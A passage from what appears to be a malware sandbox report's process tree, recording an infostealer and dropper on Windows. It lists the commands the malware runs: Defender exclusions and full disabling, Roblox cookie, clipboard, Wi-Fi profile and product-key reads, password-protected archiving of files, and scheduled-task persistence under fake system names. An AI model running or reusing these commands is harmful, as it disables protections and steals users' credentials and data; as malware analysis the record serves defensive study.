        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:3824
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\33f6bbdf-b203-40a8-b2a8-39e0fcf0ac40.vbs"
        14⤵
        
        PID:5292
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        15⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:7120
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5aab39bb-2773-4948-8847-b951701cb718.vbs"
        16⤵
        
        PID:4036
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:6668
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\17cdf47a-f847-4922-af9d-c698805ce55e.vbs"
        18⤵
        
        PID:7004
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        19⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:6596
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a22f52a4-c047-49f1-82fa-6019ddf38af5.vbs"
        20⤵
        
        PID:2992
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        21⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5000
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f6c1e8f9-58a2-4b13-a9b7-5b9878831e86.vbs"
        22⤵
        
        PID:5764
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        23⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:6544
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0c56e7fe-839c-4052-90cc-4e11a227537e.vbs"
        24⤵
        
        PID:3044
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        25⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5204
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e04073f9-4520-4ed1-acb1-02fcb08a7a85.vbs"
        26⤵
        
        PID:7152
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        27⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:3108
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1dcb4fe-731f-48c9-9a8a-726c3e6d38d2.vbs"
        28⤵
        
        PID:2380
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        29⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:5332
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57347e18-e703-4084-8661-c3634a13533d.vbs"
        30⤵
        
        PID:3020
        
        C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe
        
        "C:\Program Files (x86)\Windows Defender\ja-JP\powershell.exe"
        31⤵
        Checks computer location settings
        Executes dropped EXE
        Modifies registry class
        
        PID:6452
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\94d73362-98f9-4138-81b0-4a8c25628b73.vbs"
        32⤵
        
        PID:7100
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e2e46592-5cf4-452e-a2cb-9e75b8a815a8.vbs"
        32⤵
        
        PID:5888
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fc26e1d1-e224-44b4-baf5-1e2bbb1085a2.vbs"
        30⤵
        
        PID:1424
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4faa0c07-9586-4668-9c80-bbfb3b1f5b0b.vbs"
        28⤵
        
        PID:1452
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\546c6244-19ce-4db7-9305-3910e8f3bbcb.vbs"
        26⤵
        
        PID:516
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fda2c4ba-dd1e-48d6-83a1-e3783e90c378.vbs"
        24⤵
        
        PID:4264
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0da4876d-1c12-4f78-9605-fea453f61b6d.vbs"
        22⤵
        
        PID:4568
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\160b0f47-6a91-4713-bcf2-293b958bb6f6.vbs"
        20⤵
        
        PID:5692
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\96d6573e-bdf6-4408-8b39-6feb5e93137a.vbs"
        18⤵
        
        PID:6940
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a295a3cc-063c-40e7-b7a8-40c2b6e31083.vbs"
        16⤵
        
        PID:1296
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3e29dd8c-3ec7-4589-9889-bf9edcd61c92.vbs"
        14⤵
        
        PID:4416
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57699d72-e714-455d-9c4b-a718f3971617.vbs"
        12⤵
        
        PID:6524
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d737cf48-d52f-4c74-809a-6bfab3ce72d2.vbs"
        10⤵
        
        PID:372
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9dd8937f-b4be-4bf5-ab6c-a91661a6c0f7.vbs"
        8⤵
        
        PID:7060
- C:\Users\Admin\AppData\Roaming\scvhost.exe
  "C:\Users\Admin\AppData\Roaming\scvhost.exe"
  2⤵
  - Checks computer location settings
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\scvhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1148
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'scvhost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\sgredgkrtf09weut3r435.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1720
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4040
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'sgredgkrtf09weut3r435.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1140
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "sgredgkrtf09weut3r435" /tr "C:\Users\Admin\AppData\Roaming\sgredgkrtf09weut3r435.exe"
    3⤵
    PID:4036
- C:\Users\Admin\AppData\Roaming\setup.exe
  "C:\Users\Admin\AppData\Roaming\setup.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4016
- - C:\Users\Admin\AppData\Roaming\setup.exe
    "C:\Users\Admin\AppData\Roaming\setup.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\setup.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3644
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\setup.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1532
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4000
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1364
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5088
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      PID:552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1176
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4624
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2268
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3280
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:244
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:916
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4724
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3996
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2512
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:1412
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1552
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:412
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3896
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:912
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:4960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:1780
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe a -r -hp"Pacha123" "C:\Users\Admin\AppData\Local\Temp\PPrkk.zip" *"
      4⤵
      PID:664
    - - C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40162\rar.exe a -r -hp"Pacha123" "C:\Users\Admin\AppData\Local\Temp\PPrkk.zip" *
        5⤵
        Executes dropped EXE
        
        PID:1908
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:4924
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:3352
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2908
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:3224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:4064
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        
        PID:5748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:6360
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:6452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:6552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:6640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\sus.bat" "
  2⤵
  PID:3448
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\vbs.vbs"
  2⤵
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  PID:2928

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
1⤵
PID:4512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:3184

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:4380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
1⤵
PID:1544

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
1⤵
PID:3888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1176

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\AppReadiness\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\AppReadiness\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2908

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\AppReadiness\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\AppReadiness\explorer.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Windows\AppReadiness\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Windows\AppReadiness\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\bcastdvr\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\bcastdvr\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1132

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\bcastdvr\cmd.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\bcastdvr\cmd.exe'" /rl HIGHEST /f
1⤵
PID:872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\cmd.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:4420

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Windows\de-DE\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Windows\de-DE\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\de-DE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2456

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\de-DE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1368

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Windows\de-DE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2312

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\Windows\de-DE\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\taskhostw.exe'" /f
1⤵
- Process spawned unexpected child process
PID:4360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:4836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\taskhostw.exe'" /rl HIGHEST /f
1⤵
PID:3628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\taskhostw.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2248

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:3624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2284

C:\Windows\system32\schtasks.exe
